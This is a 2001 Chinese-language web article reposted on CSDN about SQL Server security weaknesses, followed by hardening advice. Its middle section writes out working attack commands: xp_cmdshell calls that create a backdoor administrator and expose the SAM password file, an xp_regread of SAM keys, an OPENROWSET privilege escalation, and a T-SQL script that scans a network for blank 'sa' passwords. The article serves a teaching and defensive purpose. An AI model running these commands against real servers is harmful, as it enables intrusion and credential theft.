?? 8577.htm
字號:
http://www.csdn.net/develop/library/vc/datebase/8577.shtm
'>
關于SQL SERVER的一些安全問題
</a>
</TD></tr>
<TR>
<TD align=left width=300>
<B>關鍵字:</B><BR>
sql server
</TD>
<TD align=middle width=120>
<B>貼文時間</B><br>
2001-6-29 10:23:30
</TD>
<TD align=middle width=80>
<B>文章類型: </B><BR>
收藏
</TD>
<TD align=middle width=100>
<B>給貼子投票 </B>
<BR><a href='http://www.csdn.net/develop/addscore.asp?id=
8577
'>投票</a>
</TD></TR>
<TR>
<TD >
freezwy
收藏
</TD>
<TD colSpan=3 vAlign=top>
<B>出處: </B><A href='
'>
</A></TD></TR>
<TR><TD colSpan=5 bgcolor=#cccc99> </TD></TR>
</TD></TR></TBODY></TABLE>
<div align=center><div class=fst align=left><div class=fstdiv3 id=print2>
<br><br>目前關于nt服務器的入侵,有很多種方法,如對iis的漏洞進行利用,但<br>大家不知道注意到沒有,其實通過與nt服務器相關聯的sql數據庫服務器<br>的例子也是很有比例的一種手段。大家可以參看下面的一個新聞報道:<br>http://www.vnunet.com/news/1110938。<br>herbless入侵破壞的一些站點,如legoland.co.uk站點就是通過sql服務器<br>的入侵而獲得對系統的控制權而破壞的。所以對sql服務器的保護是必不可<br>少的,這里我整理了一些漏洞供大家來參考,見笑,見笑。<br><br>----------------------------------------------------------------<br>我們先來看看sql服務程序支持的網絡協議庫:<br><br>----------------------------------------------------------------<br>| sql server network protocol libraries |<br>----------------------------------------------------------------<br>|protocol library| 可能存在的漏洞 | 是否加密 |<br>----------------------------------------------------------------<br>|named pipes | --使用nt smb端口(tcp139,udp137, | 否 |<br>|(有名管道) | 138)來進行通信,這些可以被通 | |<br>| | 的防火墻控制,但如果內部網絡可 | |<br>| | 隨意訪問的話也是一個不小的缺陷 | |<br>| | --用戶名字,密碼和數據沒有進行加 | |<br>| | 傳輸,任何人可以通過sniffer來 | |<br>| | 進行數據捕獲。 | |<br>----------------------------------------------------------------<br>|ip sockets | --默認狀態下開1433口,你可以使用| 否 |<br>| | 掃描器來查看這個端口。 | |<br>| | 可以被sniffer截獲數據。 | |<br>----------------------------------------------------------------<br>|multi-protocol | --客戶端需要支持nt rpcs;在不同 | 是 |<br>| | 種類的環境中可能引起問題。 | |<br>| | --默認情況下使用tcp隨機端口,但| |<br>| | 防火墻進行端口圖固定實現(參 | |<br>| | 看kb q164667)。 | |<br>| | --需要注意加密選項是否選擇,默 | |<br>| | 是不選擇此選項的。 | |<br>----------------------------------------------------------------<br>|nwlink | --存在被sniffer截獲數據的危險 | 否 |<br>----------------------------------------------------------------<br>|appletalk (adsp)| --存在被sniffer截獲數據的危險 | 否 |<br>----------------------------------------------------------------<br>|banyan vines | --存在被sniffer截獲數據的危險 | 否 |<br>----------------------------------------------------------------<br><br>一般的推薦使用是:如果你能在integrated (nt) security上使用named pipes 或者<br>multi-protocol,那你就使用這些協議庫,如果可能,盡量使用multi-protocol<br>和使能加密選項。如果你上面幾個不能使用,那就使用ip sockets協議,并改變<br>其默認的端口并隨時檢查系統保證無任何sniffer存在。并且,考慮使用一web服<br>務或者com組件作為應用程序的business object layer,并在中間層和sql服務程<br>序中使用安全通道(secure channel)。有不少第三方的產品可以加密這方面的通信。<br><br>-----------------------------------------------------------------------<br>下面再講一下sql server的各種安全模式和它們怎樣進行工作?<br><br>安全模式定義了一些sql server是怎樣認證要使用它們服務的用戶,請看下面<br>sql server 6.5的安全模式和在sql server 7.0做了改變的一些描述和區別:<br><br>-------------------------------------------------------------------<br>|安全模式 | sql server 6.5 | sql server 7.0改變地方 |<br>-------------------------------------------------------------------<br>|standard | --登陸定義在sql server里| --單獨的標準模式在sql server|<br>|標準模式 | 而且給定密碼。 | 沒有使用了。 |<br>| | --sql server的登錄帳戶與| |<br>| | window nt分開 | |<br>-------------------------------------------------------------------<br>|integrated |-使用安全管理器sql的帳 | --在這里成為"windows nt only"|<br>|綜合模式 | 戶。 | 模式。 |<br>| |-用戶在連接到sql server| --只工作在nt系統下,在win9x不|<br>| | 不需要特定分開login和 | 支持。 |<br>| | 密碼。 | |<br>| |-密碼從不存儲在應用程序| --可以直接結合到nt的組中便于 |<br>| | 中,并不以明文在網絡中| 管理,(注意有一builtin組在|<br>| | 傳輸。 | 本地系統上產生). |<br>| |-sql server可以使用nt的| |<br>| | 的認證方式來認證用戶并| |<br>| | 可以使用如帳戶過期等。| |<br>| |-需要named pipe或multi-| |<br>| | protocol庫。 | |<br>--------------------------------------------------------------------<br>|mixed |-提供上面的方式的一些特| --成為sql server和windows nt |<br>|混合性方式 | 征但有后退的東西是客戶| 模式。 |<br>| | 端不能建立可信任連接。| --盡量使用window nt only模式 | |<br>--------------------------------------------------------------------<br><br>登錄只不過是第一步,一旦用戶登錄,用戶必須訪問獨立的數據庫,要使上面<br>的成立,就必須在sysusers表里存在一表目給用戶用的每個數據庫。所以安全<br>請你注意在你的數據庫中是否存在"guest"帳戶和保證不會在你不注意的時候給<br>某些人訪問你的數據庫。<br><br>詳細的大家可以參看微軟的站點:<br><br>http://www.microsoft.com/technet/sql/technote/secure.asp<br><br><br>---------------------------------------------------------------------<br><br>關于sql server存在的一些安全問題:<br><br>存在"sa"帳戶,密碼就為空,而且這個密碼是sql server安全模塊成員,我們就<br>可以通過xp_cmdshell stored procedure(擴展存儲過程)來進行命<br>令操作,如:<br><br>xp_cmdshell "net user testuser ugothacked /add"<br>然后在:<br>xp_cmdshell "net localgroup administrators testuser /add"<br><br>這樣攻擊者就成功的在sql server上增加了一個用戶。<br><br>當然遠程的話,一般需要有1433口開著,通過mysql 客戶端進行連接。<br><br>當然你也可以使用:<br><br>xp_cmdshell "rdisk /s-"<br><br>的方法,這樣就在\winnt\repair目錄里重建了信息而不提示用戶。然后<br>在sam備份以后,攻擊者可以建立一個smb連接到共享或者建立一個連接:<br><br>xp_cmdshell "net share getsam=c:\winnt\repair"<br><br>利用共享獲得這個文件,然后在使用l0phtcrack來跑吧。如果smb端口被防火墻<br>控制了,或者關閉了,攻擊者也可以拷貝sam._文件到web目錄進行匿名瀏覽器<br>下載。如果人家沒有開iis,你何不用tftp呢:).<br><br>ok,通過這臺被控制的sql server服務器,攻擊者可以通過它來查找網絡內部<br>其他機器來擴大戰果,下面是一個sql腳本來列舉網絡中其他sql server存在<br>空帳戶'sa'的示例:<br><br>-----------------------------------------------------------------------<br><br>-- create temp table to store enumerated servers <br><br>set nocount on <br><br>create table #temp (shelldump varchar(255)) <br><br>insert #temp exec xp_cmdshell 'osql -l' <br><br>declare @current_server varchar(255), @conn_string varchar(255) <br><br>declare sql_cursor cursor for select * from #temp <br><br>open sql_cursor fetch next from sql_cursor into @current_server <br><br>-- loop through potential targets and check for null sa accounts <br><br>-- if target is vulnerable, version information will be displayed <br><br>while @@fetch_status = 0 <br><br>begin <br><br>if @current_server <> 'servers:' <br><br>begin <br><br>select @current_server = rtrim(ltrim(@current_server)) <br><br>select @conn_string = 'exec xp_cmdshell ''osql -s' + @current_server + ' -usa -p -q "select @@version"''' <br><br>print 'attempting connection to server: ' + @current_server <br><br>execute (@conn_string) <br><br>print '=====================================================================' <br><br>end <br><br>fetch next from sql_cursor into @current_server <br><br>end <br><br>--clean up <br><br>close sql_cursor <br><br>deallocate sql_cursor<br><br>drop table #temp<br><br>----------------------------------------------------------------------<br><br>當然有些人也可能關閉xp_cmdshell extended stored procedure(擴展存儲過程),<br>我們也可以使用下面的方法:<br><br>xp_regread 'hkey_local_machine', 'security\sam\domains\account', 'f'<br><br>如果mssqlserver 服務在本地系統帳戶下運行,并且如果系統上沒有安裝syskey,上面<br>的調用就可以返回注冊表中加密的密碼或者sid。<br><br>--------------------------------------------------------------------------<br><br>另一個漏洞,是關于adhoc heterogenous queries 來進行權利的提升,請看下面微軟<br>的描述:http://www.microsoft.com/technet/security/bulletin/fq00-014.asp<br><br>關于上面的漏洞,可以使用下面的xploit來獲得權利的提升:<br><br>select * from openrowset('sqloledb','trusted_connection=yes;data source=myserver',<br>'set fmtonly off execute master..xp_cmdshell "dir c:\"')<br><br>這是大家比較喜歡的一種可以執行其他命令,自己想吧。<br><br>---------------------------------------------------------------------------<br><br>還有就是最近的一個漏洞:extended stored procedure parameter parsing (擴展存儲<br>過程參數解析)的漏洞,詳細信息在這個url有介紹:<br>http://www.microsoft.com/technet/security/bulletin/ms00-092.asp。<br><br>起主要問題是在msd中提供一個api函數srv_paraminfo(),它是用來擴展存儲過程調用時<br>解釋深入參數的,如:<br><br>exec <存儲過程名> <參數1>, <參數2>, ...<br>如要查詢“c:\winnt”的目錄樹,可以如下表達:<br>exec xp_dirtree 'c:\winnt'<br><br>但沒有檢查各個參數的長度,傳遞相當長的字符串,就存在了覆蓋其他堆棧<br>參數的可能導致緩沖溢出。<br><br>目前已經知道的過程如下:<br>目前已知受影響的擴展存儲過程如下:<br><br>1、xp_peekqueue (xpqueue.dll)<br>xp_printstatements (xprepl.dll)<br><br>給第一個參數傳遞超長的字符串會覆蓋異常處理程序所保存的返回地址。<br><br>2、xp_proxiedmetadata (xprepl.dll)<br><br>該存儲過程使用4個參數。給第二個參數傳遞超長的字符串會覆蓋異常處<br>理程序所保存的返回地址。<br><br>3、xp_setsqlsecurity (xpstar.dll)<br><br>該存儲過程使用4個參數。給第三個參數傳遞超長的字符串會使整個sql <br>server進程立即終止。<br><br>4、xp_displayparamstmt(xprepl.dll)<br>xp_enumresultset(xprepl.dll)<br>xp_showcolv (xprepl.dll)<br>xp_updatecolvbm (xprepl.dll)<br><br>給第一個參數傳遞超長的串將導致非法操作并覆蓋異常處理程序所保存的返<br>回地址。<br><br>這里告訴大家一個技巧性的東西,如果想要知道這些擴展存儲過程調用了那寫dll<br>文件,你可以如下操作,如:<br><br>select o.name,c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and o.name = 'xp_peekqueue' <br><br>這樣你就可以獲得調用這個擴展存儲過程的dll了,如果微軟沒有出補丁的話,你就<br>暫時把這個dll文件改名吧,當然有些dll文件調用幾個擴展存儲過程,不能盲目更改,<br>否則導致其他的也不能使用,你需要使用下面的操作來知道dll調用那些擴展存儲過程:<br><br>select o.name,c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and c.text = 'xpqueue.dll' <br><br>幸好微軟出了補丁,你可以到下面的地方找到,不用一個一個找dll程序了,呵呵:<br><br>http://support.microsoft.com/support/sql/xp_security.asp<br><br>這個漏洞@stake發現并提供演示的測試代碼,大家可在這里找到:<br><br>http://www.atstake.com/research/advisories/2000/sqladv2-poc.c<br><br>--------------------------------------------------------------------------<br><br>ok,當然sql server也有一些其他漏洞,相對輕微些,如iss發現的管理員<br>login id存儲在注冊表中,其加密的方法比較簡單,很容易獲得,詳細情況<br>請看:http://xforce.iss.net/alerts/advise45.php3。大家可以到其他<br>地方找找。<br><br>---------------------------------------------------------------------<br><br>一些對sql server系統的安全建議:<br><br>--保證打上最新的安全補丁,如下:<br>windows nt 4.0 - service pack 6a<br><br>sql server 6.5 - service pack 5a<br><br>sql server 7.0 - service pack 2. (various hotfixes - check <br>http://www.microsoft.com/download) <br><br>sql server 2000 - hotfix s80233i.exe (intel)<br>當然大家要密切注意微軟的安全公告。<br><br>--不要在ip sockets使用端口1433,如果你使用multi-protocol也請<br>修改端口。<br><br>--不要把'sa'密碼嵌入到任意應用程序如vb/delphi apps里,或者一<br>global.asa文件里,因為"sa"是sql server 的一個默認密碼,其權限<br>類似與windows nt系統里的管理員帳戶,而且密碼為空。<br><br>--改變'sa'和'probe'帳戶的密碼。<br><br>--保證sql server的錯誤記錄在ntfs系統上。<br><br>--如果你不需要xp_cmdshell( use sp_dropextendedproc 'xp_cmdshell' ) <br>就不要把xp_cmdshell extended stored proc(擴展存儲過程) 留在服務<br>器上。在任何isql窗口中輸入:<br>use master<br>sp_dropextendedproc 'xp_cmdshell'<br><br>--丟棄不需要ole自動存儲過程,當然enterprise manager中的某些特征也<br>會不能使用,這些過程包括如下:<br><br>sp_oacreate sp_oadestroy <br><br>sp_oageterrorinfo sp_oagetproperty <br><br>sp_oamethod sp_oasetproperty <br><br>sp_oastop<br><br>--去掉不需要的注冊表訪問過程,如下:<br><br>xp_regaddmultistring <br><br>xp_regdeletekey <br><br>xp_regdeletevalue <br><br>xp_regenumvalues <br><br>xp_regread <br><br>xp_regremovemultistring <br><br>xp_regwrite<br><br>--去掉其他系統存儲過程,如果你認為你覺得你還有威脅,當然<br>要小心drop這些過程,你可以在測試機器上測試,保證你正常的<br>系統能完成工作,這些過程包括:<br><br>sp_bindsession sp_cursor sp_cursorclose<br>sp_cursorfetch sp_cursoropen sp_cursoroption<br>sp_getbindtoken sp_getmbcscharlen sp_ismbcsleadbyte<br>sp_oacreate sp_oadestroy sp_oageterrorinfo<br>sp_oagetproperty sp_oamethod sp_oasetproperty<br>sp_oastop sp_replcmds sp_replcounters<br>sp_repldone sp_replflush sp_replstatus<br>sp_repltrans sp_sdidebug xp_availablemedia<br>xp_cmdshell xp_deletemail xp_dirtree <br>xp_dropwebtask xp_dsninfo xp_enumdsn<br>xp_enumerrorlogs xp_enumgroups xp_enumqueuedtasks<br>xp_eventlog xp_findnextmsg xp_fixeddrives<br>xp_getfiledetails xp_getnetname xp_grantlogin<br>xp_logevent xp_loginconfig xp_logininfo<br>xp_makewebtask xp_msver xp_perfend<br>xp_perfmonitor xp_perfsample xp_perfstart<br>xp_readerrorlog xp_readmail xp_revokelogin<br>xp_runwebtask xp_schedulersignal xp_sendmail<br>xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap<br>xp_sprintf xp_sqlinventory xp_sqlregister<br>xp_sqltrace xp_sscanf xp_startmail<br>xp_stopmail xp_subdirs xp_unc_to_drive <br><br>--去掉數據庫中guest用戶。<br>--關閉sql mail兼容能力,防止傳遞一些木馬病毒等。<br>--設置一個任務處理來定時運行下面的程序:<br><br>findstr /c:"login failed" \mssql7\log\*.*'<br><br>再重定向到其他文件或者mail到管理員信箱。<br><br>--經常檢查帶有空密碼的帳戶:<br><br>use master<br>select name,<br>password<br>from syslogins<br>where password is null<br>order by name<br><br>--檢查所有不需要'sa'權限的存儲過程和擴展存儲過程訪問權限:<br><br>use master<br>select sysobjects.name<br>from sysobjects, sysprotects<br>where sysprotects.uid = 0<br>and xtype in ('x','p')<br>and sysobjects.id = sysprotects.id<br>order by name<br><br><br>--保證sql server的傳輸信息在隔離的網絡段中。<br><br><br>
</DIV></div></div>
<script src='../../../get_readnum.asp?id=
8577
'></script>
</center></BODY></HTML>
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -